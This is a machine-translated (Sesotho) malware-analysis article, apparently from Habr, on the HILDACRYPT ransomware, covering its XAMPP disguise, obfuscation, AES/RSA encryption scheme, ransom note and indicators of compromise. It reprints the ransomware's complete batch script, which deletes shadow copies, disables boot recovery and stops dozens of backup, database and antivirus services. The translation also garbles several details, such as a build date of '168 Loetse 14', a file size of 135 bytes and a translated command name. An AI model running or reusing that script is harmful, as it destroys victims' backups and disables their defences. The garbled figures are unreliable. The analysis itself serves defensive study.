Lumela, Habr! Hape, re bua ka mefuta ea morao-rao ea malware ho tsoa sehlopheng sa Ransomware. HILDACRYPT ke ransomware e ncha, setho sa lelapa la Hilda se fumanoeng ka Phato 2019, se rehelletsoeng ka setšoantšo sa Netflix se neng se sebelisetsoa ho tsamaisa software. Kajeno re ntse re tloaelana le likarolo tsa tekheniki tsa vaerase ena e ntlafalitsoeng ea thekollo.
Phetolelong ea pele ea Hilda ransomware, sehokelo ho e behiloeng ho Youtube letoto la lipopae le ne le le lengolong la thekollo. HILDACRYPT e iketsa eka ke sehokelo se molaong sa XAMPP, phepelo ea Apache e fumanehang habonolo e kenyelletsang MariaDB, PHP, le Perl. Ka nako e ts'oanang, cryptolocker e na le lebitso le fapaneng la faele - xamp. Ntle le moo, faele ea ransomware ha e na signature ea elektroniki.
Tlhahlobo e tsitsitseng
Thekollo e fumaneha ka har'a faele ea PE32 .NET e ngotsoeng bakeng sa MS Windows. Boholo ba eona ke li-byte tse 135. Ka bobeli khoutu ea mantlha ea lenaneo le khoutu ea lenaneo la mosireletsi li ngotsoe ho C #. Ho latela letsatsi la pokello le setempe sa nako, binary e thehiloe ka la 168 Loetse 14.
Ho latela Detect It Easy, ransomware e bolokiloe ho sebelisoa Confuser le ConfuserEx, empa li-obfuscators tsena li tšoana le pele, ke ConfuserEx feela mohlahlami oa Confuser, kahoo li-signature tsa bona tsa khoutu li tšoana.
HILDACRYPT e hlile e phuthetsoe ka ConfuserEx.
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Hlasela vector
Ho ka etsahala hore ebe thekollo e ile ea sibolloa ho e 'ngoe ea libaka tsa marang-rang tsa marang-rang, e iketsang eka ke lenaneo le molaong la XAMPP.
Ketane eohle ea ts'oaetso e ka bonoa ho .
Obfuscation
Likhoele tsa thekollo li bolokiloe ka mokhoa o patiloeng. Ha e qala, HILDACRYPT e li hlakola ka ho sebelisa Base64 le AES-256-CBC.
bophirima
Pele ho tsohle, thekollo e etsa foldara ho %AppDataRoaming% moo paramente ea GUID (Globally Unique Identifier) e hlahisoang ka tšohanyetso. Ka ho kenyelletsa faele ea bat sebakeng sena, kokoana-hloko ea ransomware e e qala e sebelisa cmd.exe:
cmd.exe /c JKfgkgj3hjgfhjka.bat & tsoa
E ntan'o qala ho etsa mongolo oa batch ho tima likarolo kapa lits'ebeletso tsa sistimi.
Script e na le lethathamo le lelelele la litaelo tse senyang likopi tsa moriti, thibela seva sa SQL, litharollo tsa bekapo le li-antivirus.
Mohlala, ha e atlehe ho emisa lits'ebeletso tsa Backup ea Acronis. Ntle le moo, e hlasela lits'ebetso tsa "backup" le litharollo tsa antivirus ho tsoa ho barekisi ba latelang: Veeam, Sophos, Kaspersky, McAfee le ba bang.
@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop “Sophos Device Control Service” /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop “Zoolz 2 Service” /y
net stop McTaskManager /y
net stop “Sophos AutoUpdate Service” /y
net stop “Sophos System Protection Service” /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop “Symantec System Recovery” /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop “Sophos Health Service” /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop “Sophos Message Router” /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop “Sophos Clean Service” /y
net stop swi_update_64 /y
net stop “Sophos Web Control Service” /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop “Veeam Backup Catalog Data Service” /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop “Sophos MCS Client” /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop “SQLsafe Backup Service” /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop “Sophos Safestore Service” /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop “Sophos File Scanner Service” /y
net stop “Sophos Agent” /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop “Enterprise Client Service” /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop “SQL Backups” /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop “Sophos MCS Agent” /y
net stop RESvc /y
net stop “Acronis VSS Provider” /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop “SQLsafe Filter Service” /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0
Hang ha lits'ebeletso le lits'ebetso tse boletsoeng ka holimo li holofetse, cryptolocker e bokella tlhahisoleseling mabapi le lits'ebetso tsohle tse sebelisang taelo ea lenane la mesebetsi ho netefatsa hore lits'ebeletso tsohle tse hlokahalang li theohile.
lenane la mesebetsi v/fo csv
Taelo ena e bonts'a lethathamo le qaqileng la lits'ebetso tse sebetsang, tseo likarolo tsa tsona li arotsoeng ke "," lets'oao.
««csrss.exe»,«448»,«services»,«0»,«1�896 ��»,«unknown»,»�/�»,«0:00:03»,»�/�»»
Ka mor'a tlhahlobo ena, ransomware e qala ts'ebetso ea encryption.
Ho patala
Tlhaloso ea faele
HILDACRYPT e feta har'a likahare tsohle tse fumanoeng tsa li-hard drive, ntle le lifoldara tsa Recycle.Bin le Reference AssembliesMicrosoft. Ea ho qetela e na le lifaele tsa dll, pdb, joalo-joalo bakeng sa lits'ebetso tsa .Net tse ka amang ts'ebetso ea ransomware. Ho batla lifaele tse tla ngolisoa, ho sebelisoa lethathamo le latelang la likeketso:
«.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md»
Thekollo e sebelisa algorithm ea AES-256-CBC ho patala lifaele tsa basebelisi. Boholo ba senotlolo ke li-bits tse 256 mme boholo ba vector (IV) ke 16 bytes.
Ho skrini se latelang, boleng ba byte_2 le byte_1 bo fumanoe ka tšohanyetso ho sebelisoa GetBytes().
Senotlolo
ВИ
Faele e kentsoeng e na le katoloso ea HCY!. Ona ke mohlala oa faele e patiloeng. Senotlolo le IV tse boletsoeng ka holimo li etselitsoe faele ena.
Koetliso ea senotlolo
Cryptolocker e boloka senotlolo sa AES se hlahisitsoeng faeleng e patiloeng. Karolo ea pele ea faele e kentsoeng e na le hlooho e nang le data e kang HILDACRYPT, KEY, IV, FileLen ka mokhoa oa XML, 'me e shebahala tjena:
AES le IV key encryption e etsoa ka RSA-2048, 'me encoding e etsoa ka Base64. Senotlolo sa sechaba sa RSA se bolokiloe 'meleng oa cryptolocker ho e' ngoe ea likhoele tse patiloeng ka sebopeho sa XML.
28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB
Senotlolo sa sechaba sa RSA se sebelisoa ho notlela senotlolo sa faele sa AES. Senotlolo sa sechaba sa RSA se kentsoe Base64 'me se na le modulus le moemeli oa sechaba oa 65537. Decryption e hloka senotlolo sa lekunutu sa RSA, seo mohlaseli a nang le sona.
Kamora encryption ea RSA, senotlolo sa AES se kentsoe ho sebelisoa Base64 e bolokiloeng faeleng e patiloeng.
Molaetsa oa thekollo
Hang ha encryption e phethiloe, HILDACRYPT e ngola faele ea html foldareng eo e kentseng lifaele ka eona. Tsebiso ea thekollo e na le liaterese tse peli tsa lengolo-tsoibila moo mohlaseluoa a ka ikopanyang le mohlaseli.
Tsebiso ea bosholu e boetse e na le mola "No loli e bolokehile;)" - e buang ka libapali tsa anime le tsa manga tse nang le ponahalo ea banana ba banyenyane ba thibetsoeng Japane.
fihlela qeto e
HILDACRYPT, lelapa le lecha la ransomware, le hlahisitse mofuta o mocha. Moetso oa encryption o thibela motho ea hlokofalitsoeng ho hlakola lifaele tse patiloeng ke ransomware. Cryptolocker e sebelisa mekhoa ea ts'ireletso e sebetsang ho thibela lits'ebeletso tsa ts'ireletso tse amanang le li-backups le litharollo tsa antivirus. Sengoli sa HILDACRYPT ke molateli oa letoto la lipopae la Hilda le bontšitsoeng ho Netflix, sehokelo sa k'haravene se neng se le lengolong la theko bakeng sa mofuta o fetileng oa lenaneo.
Ka tloaelo, и e ka sireletsa komporo ea hau ho HILDACRYPT ransomware, mme bafani ba na le bokhoni ba ho sireletsa bareki ba bona ka . Tšireletso e netefatsoa ke taba ea hore litharollo tsena li kenyeletsa ha e kenyeletse feela bekapo, empa hape le sistimi ea rona e kopaneng ea ts'ireletso - E matlafalitsoe ke mokhoa oa ho ithuta oa mochini 'me o ipapisitse le boits'oaro ba boits'oaro, theknoloji e khonang ho loants'a ts'okelo ea ransomware ea matsatsi a zero joalo ka tse ling.
Lipontšo tsa ho sekisetsa
Katoloso ea lifaele HCY!
HILDACRYPTReadMe.html
xamp.exe e nang le tlhaku e le 'ngoe "p" mme ha e na signature ea dijithale
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Source: www.habr.com